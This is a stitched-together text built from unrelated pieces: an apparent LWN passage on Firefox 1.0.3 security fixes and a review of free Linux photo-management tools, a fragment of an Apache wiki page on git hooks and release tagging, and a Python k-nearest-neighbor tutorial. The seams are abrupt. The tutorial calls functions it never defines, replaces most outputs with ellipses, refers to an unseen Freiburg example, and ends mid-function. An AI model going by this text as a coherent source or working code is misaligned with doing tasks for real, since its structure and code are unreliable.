The latest update closed nine security vulnerabilities: three tagged "critical," two rated "high" severity and four rated "moderate." Some of the vulnerabilities have yet to be disclosed, despite the fact that the update is now available. Hofmann said that the project was respecting the wishes of the person reporting the bugs, and that the project tries to use "best judgement" about providing information about exploits. He also noted that it gives users ample time to install updates prior to releasing information that might be used to exploit vulnerabilities. We also checked the Mozilla Project's security policies to see what they had to say about disclosure: Interested readers may also want to peruse the rest of the Mozilla project's security policies.

The 1.0.3 release went through several release candidates before it was finally officially released. We asked Hofmann about the length of time required to release a security fix, what was involved and why it took several weeks to push out a patch. Hofmann said that the Mozilla team was capable of putting out a release quickly, and noted the 24-hour turnaround with the shell exploit discovered last fall.
Hofmann also pointed out that the Mozilla team has pushed out security updates in a matter of days or weeks, whereas Microsoft has been known to push out fixes for vulnerabilities that have been known for months rather than just a short time. He also noted that the team needs to push out documentation updates, and get information out to application developers and authors of extensions. Hofmann said that a couple of the changes in the 1.0.3 release will require some extension authors to make "adjustments to be forward-compatible" and that most extensions that were affected already have new versions available for Firefox 1.0.3. At any rate, as pointed out on MozillaNews, there have been more vulnerabilities documented by Symantec that affect Mozilla browsers, but that IE has a greater number of high-severity vulnerabilities. It should also be noted that the vulnerabilities listed for Firefox have not been widely exploited, while IE has been widely exploited. Several critical issues in IE remain open. To be fair, a few vulnerabilities are still listed for Firefox as well. It's certainly true that Firefox and the Mozilla Suite are not perfect, and do not offer a 100 percent guarantee against security problems simply because the projects are open source. The increased attention being paid to Firefox almost assures that further vulnerabilities will be found. However, the project is developing a good track record of fixing security vulnerabilities as they are discovered, and proactively seeking out security problems. To date, Hofmann says that he is not aware of any exploits in the wild that affect Firefox or Mozilla, which means that the vulnerabilities that have been reported have not had any real impact on the Mozilla userbase aside from the inconvenience of upgrading -- which can hardly be said for Internet Explorer. 
Those with a careful eye for distinguishing between the severity of vulnerabilities, the length of time required to find fixes and actual exploits, will find that Firefox is still the better choice for security-conscious users. The technology of photography has moved forward in recent years, but certain issues remain. Your editor's closets contain numerous binders full of carefully organized negatives, contact sheets, and slides. Said closets also contain several boxes full of rather less carefully organized photographic output. There's a lot of great pictures there, but chances are good that nobody will ever see them. Organizing photographs is hard. Now your editor's hard drive looks rather like those boxes in the closet; several years worth of digital photos have accumulated in a messy directory hierarchy with no easy way to find anything of interest. The move to the digital format has, if anything, made the mess worse. How can one cope with all those images? Your editor decided that there must be a free application out there which might help; here is what he found. Any graphical file manager can enable mouse-based navigation through a directory tree full of images. An application tuned to image management, however, should offer more than that. Anything that can be done to help find a specific image - searching by date, where the picture was taken, who is in it, etc. - is more than welcome. One should not have to dig through a huge box of photos to find that darling shot of one's toddler performing gravity research with the new laptop. This sort of searching requires the creation and maintenance of metadata for images; a good application will make that task easy. Images from digital cameras include a significant amount of embedded data in the exchangeable image file format (EXIF). The EXIF data can contain the date and time of the picture and a great deal of information on the state of the camera. 
An image manager should provide easy access to that data, and make use of it when appropriate. Image management also involves various types of image manipulation. At the simple end of the scale, this means quickly getting rid of the unsuccessful (or incriminating) shots, and, perhaps, changing the orientation of portrait-mode shots. Your editor has found that the family does not always appreciate receiving full-resolution images from his 7 megapixel camera, so the ability to rescale images is needed. Cropping is another common task, both to remove uninteresting imagery or to fit a specific aspect ratio. From there, one can get into color balance tweaking, red-eye removal, noise removal, in-law removal, and advanced psychedelic effects. A good image manager should make the simpler tasks quick and easy, and the harder tasks possible - even if that just involves dumping the user into the Gimp. An image manager should work well with the rest of the system; it doesn't necessarily help to fix up an image if you can't find the result afterward. An image manager which claims ownership over images and makes them hard to find outside of the application is making life harder. Similarly, some graphical users may appreciate a "move to trash" capability, but the more grumpy among us still like files to simply go away when asked, and have no use for a trash can; an image manager should be able to make files just go away. A good image manager will make printing easy, including selecting high-quality modes, printing multiple images per page, etc. An added bonus for some users might be the ability to quickly create a web page with a set of images. The ability to write a set of images to a CD might also be useful for some. Your editor reviewed five image management applications, and spent a long day valiantly trying to build a working version of a sixth. Each tool was used to work with its own copy of a directory hierarchy containing about 3000 photos taken over many years. 
This has been a fun project; there is some good work being done in this area. Free image management tools are still in a relatively primitive form, however; some of them are maturing quickly, but there is some ground yet to cover. Your editor reviewed DigiKam once before, as part of a previous article on camera interface tools. We'll return to digiKam (and gthumb, below) to examine its image management capabilities. DigiKam is a KDE-based application under active development; version 0.7.2 was released on March 4. DigiKam wants to organize images into "albums." An album is a simple directory full of image files, though digiKam goes out of its way to hide that fact. Files can be "imported" into an album from anywhere; if the file comes from outside the album's directory, however, a copy will be made. The importing process for a large tree of images can be slow, but it only has to be done once. A binary file (digikam.db) appears to track all of the albums known to the application. The digiKam window shows a pane with the album hierarchy, and a large area with thumbnails from the currently-selected album. By default, the thumbnails are annotated with the size of the image (only); the presentation used consumes a relatively large amount of screen space. Double-clicking on a thumbnail will produce a new window displaying the image itself. The left-hand pane also includes an area called "My Tags." A few predefined tags ("Events," "People") exist; adding others is easily done with the menus. Clicking on a tag will bring up all images which currently have that tag assigned to them. There appears to be no way to get a view of more than one tag at once. Tags are hierarchical, but there is no inheritance by default. So, for example, if you create tags for each family member under "People," and assign those tags to images, clicking on "People" will not display any of those images. There is a configuration option to change this behavior, however. 
Assignment of tags to images is done by way of a right-button menu attached to the thumbnail images. There is also a separate "comments and tags" dialog which, in addition to tag management, allows comments to be associated with images. Both comments and tags are displayed underneath each thumbnail image. Other dialogs available from the thumbnail view include a "file properties" window and an EXIF information browser. The properties dialog allows the name and permissions of the file to be changed; it will happily make an image file setuid if you ask. There is also a histogram display which gives information on color distribution in the image. The EXIF browser provides full (read-only) access to the metadata stored within the image file; it has a help window describing (briefly) what each EXIF field means. The image window displays the picture itself, and provides a set of editing options. Rotation, resizing, and cropping are done here; there appears to be no way to constrain the aspect ratio of a cropped image. Rotation of images in digiKam is not optimal: each image must be brought up separately in the image window, rotated, then saved. When you've just pulled dozens of images from your camera, you would like a quicker way to get that job done. Your editor's research indicates that the image window rotation is not lossless. There is said to be a plugin available which can do lossless rotation, but your editor was not able to get it installed. Printing is a big hole in digiKam's capabilities. There appears to be no option to print multiple images at once (much less N-per-page capabilities). The image view window can print a single image, but it requires the user to type in a print command. At this point in the development of the Linux desktop, we can do better than that. Like most KDE applications, digiKam is highly configurable; most users will want to tweak at least a few options. 
By default, digiKam wants to use a "trash can" when asked to remove images, but it can be convinced to simply delete them instead. There is also a plugin mechanism which can be used to add image editing tools. In summary, digiKam is a capable and useful tool with a few remaining shortcomings. Given its pace of development, chances are that those issues will be ironed out in short order. Perhaps the newest entry into the image management space is f-spot, currently at version 0.0.12. It is a Mono application, written in C#. Despite its youth, f-spot already shows considerable promise, and is a useful application. f-spot does not bother with albums, directories, or any such nonsense. Instead, it implements a single, time-sorted stream of images with the ability to sort on various types of metadata. Images must be imported into f-spot before use, and the import process can be quite slow. After the import process, the user gets a window with a list of tags on the left, an information area on the bottom left, and a large pane with (possibly thousands of) thumbnails. The thumbnails are not rendered until needed, thankfully. A feature unique to f-spot is a timeline at the top; clicking on a given month will scroll the thumbnail window to pictures taken on that date. The timeline is not updated when the thumbnail window is scrolled, however, so the two can get out of sync. The sorting of images depends on the date stored in each image's EXIF data; if that data does not exist, the images are given the current date. There appears to be no way to fix an image with a missing date, so it will be forever displayed in the wrong place. Clicking on a thumbnail causes the lower-left window to be updated with information on that image - date, resolution, and exposure information. Once an image has been selected, a number of editing options are available, including color manipulation, focus adjustment, and rotation. 
It is possible to select multiple images (by holding down the control key) and rotate them in a single operation. There is a separate window which can be requested (from the "View" menu) to look at the EXIF information stored in an image. f-spot allows the user to assign tags to images in a manner very similar to digiKam's. The application also implements the concept of "categories." Your editor was not able to figure out what categories are supposed to do, and how they relate to tags. It was impossible to create new top-level tags (or categories). In general, the tag mechanism appears to need a little work. At the basic level, however, it functions just fine: clicking on a tag will narrow the thumbnail to images with that tag assigned; it is also possible to narrow further to a specific date range. It would be nice to be able to automatically attach one or more tags to images when they are imported. Double-clicking on a thumbnail replaces the thumbnail pane with the selected image. It is, thus, not possible to view the thumbnail directory and a specific image at the same time. At the bottom of the image window is a line clearly intended for the entry of comments (though the comments are used nowhere else). There is also a pulldown for the desired aspect ratio; using the mouse, a box (constrained to the chosen ratio) can be drawn over the image, and a click on the scissors icon will crop accordingly. There is a red-eye removal option; the user must first select an area to be affected. In your editor's experience, the selection must be done very carefully, or the red-eye removal will leave obvious artifacts. Given the nature of the task, it would be nice to be able to select elliptical areas, rather than squares, for red-eye removal. There is also a color editing dialog available. Nicely, the mouse wheel will quickly zoom the image in and out. f-spot handles image editing in an interesting way. 
The original image is never overwritten; instead, f-spot creates a new version (called "modified" by default). Different versions are selectable via a pulldown in the image information area. Since f-spot seems to assume you'll never do anything with the files directly, it feels free to give modified versions names like "dsc00450 (Modified (2)).jpg". There is a full set of "export" options for getting images out of f-spot. Images can be exported, for example, to Flickr, to a web gallery, or burned to a CD. The CD writing process seems to work, though some things are unclear - does the program write the original form of an image, or the modified form? The printing support in f-spot is minimal, relative to some of the other tools reviewed here; there is little control over layout and it is easy to get it to attempt to print pages which do not fit on the paper. f-spot shows some clear potential, especially for those who like the "tagged flat" method of organizing things. Its youth is apparent, but it would seem to be growing up fast; f-spot is worth watching. flphoto is a simple image manager based on the FLTK toolkit. It may be suitable for those looking for a lightweight application, but it has been left behind by the competition in a number of ways. Your editor also found this application relatively easy to crash. Version v1.2 was released in January, 2004; there does not appear to have been a great deal of development activity since then. Like digiKam, flphoto works with the concept of "albums," into which photos must be imported. Unlike digikam, however, flphoto cannot import a whole directory hierarchy at once; instead, each directory must be fed to the application separately. An album itself is really just a ".album" file which contains a list of image file names. The flphoto window consists primarily of an image viewing area. Thumbnails are presented in a long, horizontally scrolling window at the bottom; they show up in the order in which they were imported. 
Clicking on a thumbnail brings the image itself into the main part of the window. To your editor's eye, the quality of the image rendering is poorer than with other applications. Some image editing options are available, including rotation, scaling, cropping (with aspect ratio constraints), sharpening, and red-eye reduction. There is an "edit" option which fires up the GIMP on the selected image. There is no way to rotate multiple images at once. There is a "properties" window which shows basic EXIF information and allows the entry of comments; those comments are not used for anything, however. flphoto has no concept of tags, or of searching for images in any way. Printing works well, with a fair amount of flexibility in how images are printed, and even a simple calendar generator. There is a function for exporting images to a web page; flphoto is not able to burn images to a CD. Overall, flphoto is a tool with some capability, but your editor would recommend that people looking for a new image management utility look elsewhere. gthumb is a GNOME-based application; in many ways it is the most fully-featured of the set. Unlike many other image management applications, gthumb is very much directory-oriented. It is happy working with any directory tree it is pointed to; no need to create albums, import pictures, etc. It thus works well for people who use other applications in their directory hierarchy, or for those who simply want to get started quickly. The main gthumb window should look familiar by now; it has the usual directory pane and area full of thumbnails. The gthumb "folder" pane only shows one level of the hierarchy, however, which increases the amount of clicking required to wander around in a directory tree. A number of operations can be applied to images in the thumbnail view; these include lossless rotation, series renaming, and series format conversion. There is also a tool for locating duplicate images. 
Double-clicking on a thumbnail brings up the image view; it is not possible to have thumbnails and a full image on the screen simultaneously. EXIF information is available in the image view - if you happen to tell gthumb to show "comments." There are reasonable tools for scaling and cropping (with aspect ratio constraints), and a number of more advanced (but not always useful) image manipulation capabilities. There is no red-eye removal, however. Tags in gthumb are called "categories"; they are not hierarchical. gthumb supports comments on images; it also maintains the location of the image separately. Dates for images are supported; they can be taken from the EXIF information, the file date, or entered manually. The default, however, is "no date," even if the image has EXIF metadata; getting gthumb to actually use that metadata requires bringing up a dialog for each image. There does not appear to be a way to change that unfortunate default. gthumb has the most complete image searching capabilities of any of the tools tested; if you take the time to enter metadata for your images, quite a few search options are available. Searches can be done on any subset of the file name, the image comment (it greps for substrings), the location, the date (on, before, or after - there is no way to specify a date range bounded on both ends), and the categories assigned to the image. If you want to look for all pictures of Aunt Tillie taken at home since the beginning of the year, gthumb can do it. While gthumb normally works with the directory hierarchy, it also implements "catalogs," which are its version of albums. Images can be added to multiple catalogs at will. A special catalog contains the results of the most recent search; those images can be added, in bulk, to another catalog if desired. Thus, the search mechanism can be used to create catalogs relatively quickly - if you have your metadata in place. "Libraries" can be used to create hierarchies of catalogs. 
Printing support in gthumb is flexible, with the ability to print up to 16 pictures per page. What gthumb lacks (as do all the others) is the ability to specify advanced printing options, such as print quality and paper type. Since that is just the sort of thing one might want to adjust when printing photographs, this omission is a true shortcoming. KimDaBa (the KDE Image Database) is the final tool which your editor was able to make work. It has some powerful capabilities, but could benefit from some usability work. KimDaBa 2.0 was released in October, 2004. The first time a user runs KimDaBa, it asks for an image directory; all images managed by KimDaBa must be kept underneath that directory. If the number of images is large, the import process can take a very long time. When, eventually, the user quits the application, it will ask "do you want to save the changes?" without specifying what the changes are. If the user elects not to "save the changes," KimDaBa will not write its special XML file, and the whole import process must be done again the next time. As it turns out, if you modify an image, KimDaBa will happily exit without asking about saving changes, and those changes will be lost. The initial window is dismayingly textual for an image manager. It gives a few entries with names like "Folder" and "Locations"; the bulk of the window, however, consists of lines like "View images (1-100) 100 images." Clicking on one of those lines will bring up a thumbnail view with exactly 100 images in it. Images are sorted in no clear order; it has little to do with the date or the underlying directory structure. The default background is black (that can be changed), which is a little jarring. KimDaBa does provide other ways of sorting images. The "Folder" line will yield a flattened, directory-oriented view. Users can assign three types of tags to images: "persons," "locations," and "keywords." 
There is a separate view for each type of tag, allowing quick access to all photos of a specific person, taken in a specific place, or with a given keyword attached to it. The "search" line pops up a dialog which enables a search for a combination of tags. There is also the ability to look at all images within a given date range - but the date filtering does not work in conjunction with the tags. Clicking on an image pops up a window with the full image view. The image window has options for assigning tags to images and for performing rotation; there is no way to do rotation from the thumbnail view. There is also a button on the properties window which will delete the image. Amusingly, KimDaBa offers a "draw on image" option; it allows the user to add arrows, circles, and squares (in black only) to the picture. It is not clear how this capability would be useful. KimDaBa does not provide a way to get at an image's EXIF information, though it is able to use the date found there. In fact, the application will not even display an image's resolution; there seems to be no way to get that information. There is also no option to resize an image. There is a bizarre "lock images" function which causes the application to refuse to display them until the password is entered. Said password, as it turns out, is stored, in plain text, in the "index.xml" file. It would be better to leave out this sort of option; all it provides is a false feeling of security. KimDaBa offers no printing options at all, no web page export, and no CD burning. There is an export operation; it creates a special file which can be imported into KimDaBa running on another system. Work continues on KimDaBa; it appears that version 2.1 will include a plugin mechanism (presumably for image editing functions) and a date bar similar to the one provided by f-spot. One application which your editor was unable to make work is imgSeek. 
It is a Python program; its unique feature is the ability to look for images which are similar to a drawing made by the user. Version 0.8.4 of imgSeek was released in September, 2004; development seems to be quite slow since then. The version of imgSeek in Debian sid does not run as of this writing. Your editor hopes that imgSeek is able to move forward; this application's developers are trying to do some interesting things. In general, there is a lot going on in this area. Clearly the time has come for the free software world to produce some high-quality image management applications. That said, none of the tools reviewed here can truly be said to be complete, and your editor will resist the temptation to pick a "winner" from the set. Printing support is, perhaps, the weakest area at the moment; Linux now has the capability to provide a great deal of control over printing, but the image managers are not yet using it. Still, the applications reviewed here have reached the point where they are useful tools. It will be fun to see where they go from here.

Page editor: Rebecca Sobol
This is reliable! We can only guarantee a fully trusted authentication for servers we host ourselves! Authentication can later be extended to support login via ssh keys uploaded to (we need to drop this as an infra ticket).

Some projects might need additional GIT repositories containing project parts which have a completely separated lifecycle from the main project. These can be various build tools (checkstyle rules, project-specific Maven plugins which are needed to build the project) or the project site. This is needed because a GIT branch or tag always affects the whole repository.

GIT Hooks

We need to apply some hooks to the GIT repos to prevent users from changing a few things.

- grobmeier: deleting tags is possible with SVN, for example when the RC1 tag has failed the vote. Why isn't it allowed with git?
- Pulling from some external (non apache.org hosted) repository must only happen if all the respective commits are done by a person who has an iCLA on file and if the diff of the pull request is preserved on some ASF server. This can be done by extending JIRA to automatically download the diffs of a pull request. The project shall not hesitate to encourage people to sign our iCLA.
- The release plan from CouchDB can be found here:

Apache Maven has supported the usage of GIT with the maven-scm-providers-git since 2008. Be aware that the branch created by a release with GIT always covers the whole repository.

Tagging during a VOTE

Please note that the only official result of an ASF release is the source tarball! These zipped and signed sources are also the only thing a VOTE is upon. All other artifacts produced during a build are just nice-to-have goodies which are no official ASF products. This includes the TAG in any SCM hosted at the ASF or elsewhere.

Tagging policy in CouchDB

The following is true for CouchDB, which decided not to use tagging at all while voting on a release: Do not tag a release until the vote has passed.
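The tag-deletion question raised above can be answered on the server side: a `pre-receive` hook sees every ref update on its stdin as "old new ref" lines, and a deletion arrives with an all-zero new revision. The following is only an illustrative sketch of such a hook's logic, not a hook actually deployed at the ASF:

```shell
# Illustrative pre-receive hook logic: refuse pushes that delete tags.
# A ref deletion arrives as an update whose new revision is all zeros.
check_push() {
    zero=0000000000000000000000000000000000000000
    while read old new ref; do
        case "$ref" in
            refs/tags/*)
                if [ "$new" = "$zero" ]; then
                    echo "tag deletion refused: $ref"
                    return 1
                fi
                ;;
        esac
    done
    return 0
}

# Example: a normal branch push passes, a tag deletion is refused.
printf 'a1 b2 refs/heads/master\n' | check_push && echo "branch push allowed"
printf 'a1 0000000000000000000000000000000000000000 refs/tags/1.0.0-RC1\n' \
    | check_push || echo "push rejected"
```

In a real repository this logic would live in `hooks/pre-receive` and exit nonzero to make git refuse the whole push.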
CouchDB does not issue release candidates in the same way that other projects do. When most users see a release candidate, they think of it as an officially sanctioned version of the software. If we tag our release artefacts (which may be prepared by anyone, at any time) as release candidates while we vote on them, we are sending the wrong message to anyone who finds that tag in the repository. Even if we avoid calling them release candidates, all tags live in the same namespace, so we risk confusing our users if we tag the release artefacts we are voting on, as well as the release artefacts we have actually released. Deleting tags that correspond to failed votes will not help, because Git does not reliably propagate tag deletion to downstream repositories. In answer to these concerns, vote emails must only reference the tree-ish used to prepare the release. Only when the vote passes should you tag the tree-ish, preferably using the version number alone, as each Git repository corresponds to exactly one project. The resulting tags in Git form an accurate list of every official release, and every downstream repository will be eventually consistent.

Other possible tagging policies

The Apache Maven community ...
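The CouchDB policy above can be sketched as a short sequence of git commands; the repository and version number here are made up for illustration:

```shell
# Sketch of the CouchDB tag-after-vote flow (hypothetical repo/version).
set -e
workdir=$(mktemp -d)
cd "$workdir"
git init -q release-demo
cd release-demo
git -c user.name=demo -c user.email=demo@example.org \
    commit -q --allow-empty -m "prepare 1.1.0 release artefacts"

# The vote email references only the tree-ish being voted on:
treeish=$(git rev-parse HEAD)
echo "voting on tree-ish $treeish"

# ... the vote passes ...

# Only now is the tag created, using the version number alone:
git tag 1.1.0 "$treeish"
git tag --list
```

No tag exists while the vote is running, so a failed vote leaves nothing behind that would need to be deleted.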
8. k-Nearest Neighbor Classifier in Python

By Bernd Klein. Last modified: 02 Dec 2021.

As explained in the chapter Data Preparation, we need labeled learning and test data. In contrast to other classifiers, however, the pure nearest-neighbor classifiers do not do any learning, but the so-called learning set $LS$ is a basic component of the classifier. The k-Nearest-Neighbor Classifier (kNN) works directly on the learned samples instead of creating rules, in contrast to other classification methods.

Nearest Neighbor Algorithm:

Given a set of categories $C = \{c_1, c_2, ... c_m\}$, also called classes, e.g. {"male", "female"}. There is also a learnset $LS$ consisting of labelled instances:

$$LS = \{(o_1, c_{o_1}), (o_2, c_{o_2}), \cdots (o_n, c_{o_n}) \}$$

As it makes no sense to have fewer labelled items than categories, we can postulate that $n > m$ and in most cases even $n \ggg m$ (n much greater than m).

The task of classification consists in assigning a category or class $c$ to an arbitrary instance $o$. For this, we have to differentiate between two cases:

- Case 1: The instance $o$ is an element of $LS$, i.e. there is a tuple $(o, c) \in LS$. In this case, we will use the class $c$ as the classification result.
- Case 2: We assume now that $o$ is not in $LS$, or to be precise: $\forall c \in C, (o, c) \not\in LS$. $o$ is compared with all the instances of $LS$. A distance metric $d$ is used for the comparisons. We determine the $k$ closest neighbors of $o$, i.e. the items with the smallest distances. $k$ is a user-defined constant and a positive integer, which is usually small. The number $k$ is typically chosen as the square root of the size of $LS$, i.e. the total number of points in the training data set.
To determine the $k$ nearest neighbors we reorder $LS$ in the following way:

$(o_{i_1}, c_{o_{i_1}}), (o_{i_2}, c_{o_{i_2}}), \cdots (o_{i_n}, c_{o_{i_n}})$

so that $d(o_{i_j}, o) \leq d(o_{i_{j+1}}, o)$ is true for all $1 \leq j \leq {n-1}$.

The set of k-nearest neighbors $N_k$ consists of the first $k$ elements of this ordering, i.e.

$N_k = \{ (o_{i_1}, c_{o_{i_1}}), (o_{i_2}, c_{o_{i_2}}), \cdots (o_{i_k}, c_{o_{i_k}}) \}$

The most common class in this set of nearest neighbors $N_k$ will be assigned to the instance $o$. If there is no unique most common class, we take an arbitrary one of these.

There is no general way to define an optimal value for 'k'. This value depends on the data. As a general rule we can say that increasing 'k' reduces the noise, but on the other hand makes the boundaries less distinct.

The algorithm for the k-nearest neighbor classifier is among the simplest of all machine learning algorithms. k-NN is a type of instance-based learning, or lazy learning. In machine learning, lazy learning is understood to be a learning method in which generalization of the training data is delayed until a query is made to the system. On the other hand, we have eager learning, where the system usually generalizes the training data before receiving queries. In other words: the function is only approximated locally, and all the computations are performed when the actual classification is being performed.

The following picture shows in a simple way how the nearest neighbor classifier works. The puzzle piece is unknown. To find out which animal it might be we have to find the neighbors. If k=1, the only neighbor is a cat and we assume in this case that the puzzle piece should be a cat as well. If k=4, the nearest neighbors contain one chicken and three cats. In this case again, it will be safe to assume that our object in question should be a cat.
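The decision rule just described can be written down in a few lines of Python. This is only a sketch with illustrative names (`nn_classify` is not part of the tutorial's own implementation, which is developed step by step in the following sections):

```python
from collections import Counter

def nn_classify(LS, o, k, d):
    # Case 1: o is already a labelled element of the learnset LS
    for instance, label in LS:
        if instance == o:
            return label
    # Case 2: order LS by distance to o and take the k closest items
    N_k = sorted(LS, key=lambda pair: d(pair[0], o))[:k]
    # assign the most common class among the k nearest neighbors
    return Counter(label for _, label in N_k).most_common(1)[0][0]

d = lambda x, y: abs(x - y)                      # a simple 1-dimensional metric
LS = [(1, "cat"), (2, "cat"), (10, "dog"), (11, "dog")]
print(nn_classify(LS, 3, 3, d))                  # two cats among the 3 nearest -> cat
```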
k-nearest-neighbor from Scratch

Preparing the Dataset

Before we actually start with writing a nearest neighbor classifier, we need to think about the data, i.e. the learnset and the testset. We will use the "iris" dataset provided by the datasets module of sklearn:

import numpy as np
from sklearn import datasets

iris = datasets.load_iris()
data = iris.data
labels = iris.target

for i in [0, 79, 99, 121]:
    print(f"index: {i:3}, features: {data[i]}, label: {labels[i]}")

OUTPUT:
index: 0, features: [5.1 3.5 1.4 0.2], label: 0
index: 79, features: [5.7 2.6 3.5 1. ], label: 1
index: 99, features: [5.7 2.8 4.1 1.3], label: 1
index: 121, features: [5.6 2.8 4.9 2. ], label: 2

We create a learnset from the sets above. We use permutation from np.random to split the data randomly.

# seeding is only necessary for the website
# so that the values are always equal:
np.random.seed(42)
indices = np.random.permutation(len(data))
n_training_samples = 12
learn_data = data[indices[:-n_training_samples]]
learn_labels = labels[indices[:-n_training_samples]]
test_data = data[indices[-n_training_samples:]]
test_labels = labels[indices[-n_training_samples:]]

print("The first samples of our learn set:")
print(f"{'index':7s}{'data':20s}{'label':3s}")
for i in range(5):
    print(f"{i:4d} {learn_data[i]} {learn_labels[i]:3}")

print("The first samples of our test set:")
print(f"{'index':7s}{'data':20s}{'label':3s}")
for i in range(5):
    print(f"{i:4d} {test_data[i]} {test_labels[i]:3}")

OUTPUT:
The first samples of our learn set:
...
The first samples of our test set:
...

The following code visualizes the data of our learnset:

#%matplotlib widget
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D

X = []
for iclass in range(3):
    X.append([[], [], []])
    for i in range(len(learn_data)):
        if learn_labels[i] == iclass:
            X[iclass][0].append(learn_data[i][0])
            X[iclass][1].append(learn_data[i][1])
            X[iclass][2].append(sum(learn_data[i][2:]))

colours = ("r", "g", "y")
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
for iclass in range(3):
    ax.scatter(X[iclass][0], X[iclass][1], X[iclass][2], c=colours[iclass])
plt.show()

Distance metrics

We have already mentioned in detail how we
calculate the distances between the points of the sample and the object to be classified. To calculate these distances we need a distance function. In n-dimensional vector spaces, one usually uses one of the following three distance metrics:

Euclidean Distance

The Euclidean distance between two points x and y in either the plane or 3-dimensional space measures the length of a line segment connecting these two points. It can be calculated from the Cartesian coordinates of the points using the Pythagorean theorem, therefore it is also occasionally called the Pythagorean distance. The general formula is

$$d(x, y) = \sqrt{\sum_{i=1}^{n} (x_i - y_i)^2}$$

Manhattan Distance

It is defined as the sum of the absolute values of the differences between the coordinates of x and y:

$$d(x, y) = \sum_{i=1}^{n} |x_i - y_i|$$

Minkowski Distance

The Minkowski distance generalizes the Euclidean and the Manhattan distance into one distance metric. If we set the parameter p in the following formula to 1 we get the Manhattan distance, and using the value 2 gives us the Euclidean distance:

$$d(x, y) = { \left(\sum_{i=1}^{n} |x_i - y_i|^p \right)}^{\frac{1}{p}}$$

The following diagram visualises the Euclidean and the Manhattan distance: The blue line illustrates the Euclidean distance between the green and red dot. Otherwise you can also move over the orange, green or yellow line from the green point to the red point. These lines correspond to the Manhattan distance, and their lengths are all equal.

Determining the Neighbors

To determine the similarity between two instances, we will use the Euclidean distance.
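The relationship between the three metrics can be checked directly: with p=1 the Minkowski formula reduces to the Manhattan distance, and with p=2 to the Euclidean distance. Here is a plain-Python sketch of the formulas above (the function name `minkowski` is chosen for illustration):

```python
def minkowski(x, y, p):
    # general Minkowski distance between two points x and y
    return sum(abs(a - b) ** p for a, b in zip(x, y)) ** (1 / p)

x, y = (3, 5), (1, 1)
print(minkowski(x, y, 1))   # Manhattan: |3-1| + |5-1| = 6
print(minkowski(x, y, 2))   # Euclidean: sqrt(2**2 + 4**2) ≈ 4.472
```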
We can calculate the Euclidean distance with the function norm of the module np.linalg:

def distance(instance1, instance2):
    """ Calculates the Euclidean distance between two instances """
    return np.linalg.norm(np.subtract(instance1, instance2))

print(distance([3, 5], [1, 1]))
print(distance(learn_data[3], learn_data[44]))

OUTPUT:
4.47213595499958
3.4190641994557516

The function get_neighbors returns a list with k neighbors, which are closest to the instance test_instance:

def get_neighbors(training_set, labels, test_instance, k, distance):
    """
    get_neighbors calculates a list of the k nearest neighbors
    of an instance 'test_instance'.
    The function returns a list of k 3-tuples.
    Each 3-tuple consists of (sample, distance, label).
    """
    distances = []
    for index in range(len(training_set)):
        dist = distance(test_instance, training_set[index])
        distances.append((training_set[index], dist, labels[index]))
    distances.sort(key=lambda x: x[1])
    neighbors = distances[:k]
    return neighbors

We test the function on some of our test samples:

for i in range(5):
    neighbors = get_neighbors(learn_data, learn_labels, test_data[i], 3, distance=distance)
    print("Index:        ", i, '\n',
          "Testset Data: ", test_data[i], '\n',
          "Testset Label:", test_labels[i], '\n',
          "Neighbors:    ", neighbors, '\n')

OUTPUT:
Index: 0
Testset Data: [5.7 2.8 4.1 1.3]
Testset Label: 1
Neighbors: ...

Index: 1
Testset Data: [6.5 3. 5.5 1.8]
Testset Label: 2
Neighbors: ...

Index: 2
Testset Data: [6.3 2.3 4.4 1.3]
Testset Label: 1
Neighbors: ...

Index: 3
Testset Data: [6.4 2.9 4.3 1.3]
Testset Label: 1
Neighbors: ...

Index: 4
Testset Data: [5.6 2.8 4.9 2. ]
Testset Label: 2
Neighbors: ...

Voting to get a Single Result

We will write a vote function now. This function uses the class Counter from collections to count the quantity of the classes inside of an instance list. This instance list will be the neighbors of course.
The function vote returns the most common class:

from collections import Counter

def vote(neighbors):
    class_counter = Counter()
    for neighbor in neighbors:
        class_counter[neighbor[2]] += 1
    return class_counter.most_common(1)[0][0]

We will test 'vote' on our training samples:

for i in range(n_training_samples):
    neighbors = get_neighbors(learn_data, learn_labels, test_data[i], 3, distance=distance)
    print("index: ", i, ", result of vote: ", vote(neighbors),
          ", label: ", test_labels[i], ", data: ", test_data[i])

OUTPUT: ...

'vote' only returns the winning class. The function 'vote_prob' additionally returns the winner's share of the votes:

for i in range(n_training_samples):
    neighbors = get_neighbors(learn_data, learn_labels, test_data[i], 5, distance=distance)
    print("index: ", i, ", vote_prob: ", vote_prob(neighbors),
          ", label: ", test_labels[i], ", data: ", test_data[i])

OUTPUT: ...

Another Example for Nearest Neighbor Classification

We want to test the previous functions with another very simple dataset:

train_set = [(1, 2, 2), (-3, -2, 0), (1, 1, 3), (-3, -3, -1),
             (-3, -2, -0.5), (0, 0.3, 0.8), (-0.5, 0.6, 0.7), (0, 0, 0)]
labels = ['apple', 'banana', 'apple', 'banana', 'apple', 'orange', 'orange', 'orange']

k = 2
for test_instance in [(0, 0, 0), (2, 2, 2), (-3, -1, 0),
                      (0, 1, 0.9), (1, 1.5, 1.8), (0.9, 0.8, 1.6)]:
    neighbors = get_neighbors(train_set, labels, test_instance, k, distance=distance)
    print("vote distance weights: ", vote_distance_weights(neighbors))

OUTPUT: ...

You may wonder why the city of Freiburg has not been recognized. The reason is that our data file with the city names contains only "Freiburg im Breisgau". If you add "Freiburg" as an entry, it will be recognized as well.

Marvin and James introduce us to our next example:

Can you help Marvin and James? You will need an English dictionary and a k-nearest Neighbor classifier to solve this problem. If you work under Linux (especially Ubuntu), you can find a file with a British-English dictionary under /usr/share/dict/british-english.
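The definitions of vote_prob and vote_distance_weights are not shown in this chapter excerpt. The following sketch is merely consistent with how they are called here: vote_prob returns the winner together with its share of the k votes, and vote_distance_weights weights each vote by the neighbor's distance. The inverse-distance weighting 1/(dist + 1) is an assumption chosen for illustration, not necessarily the tutorial's exact formula:

```python
from collections import Counter

def vote_prob(neighbors):
    # winner plus its fraction of the k votes; neighbors are
    # (sample, distance, label) 3-tuples as returned by get_neighbors
    class_counter = Counter(neighbor[2] for neighbor in neighbors)
    winner, votes4winner = class_counter.most_common(1)[0]
    return winner, votes4winner / len(neighbors)

def vote_distance_weights(neighbors, all_results=True):
    # closer neighbors count for more: weight = 1 / (distance + 1)
    # (assumed weighting, used only for illustration)
    class_counter = Counter()
    for _, dist, label in neighbors:
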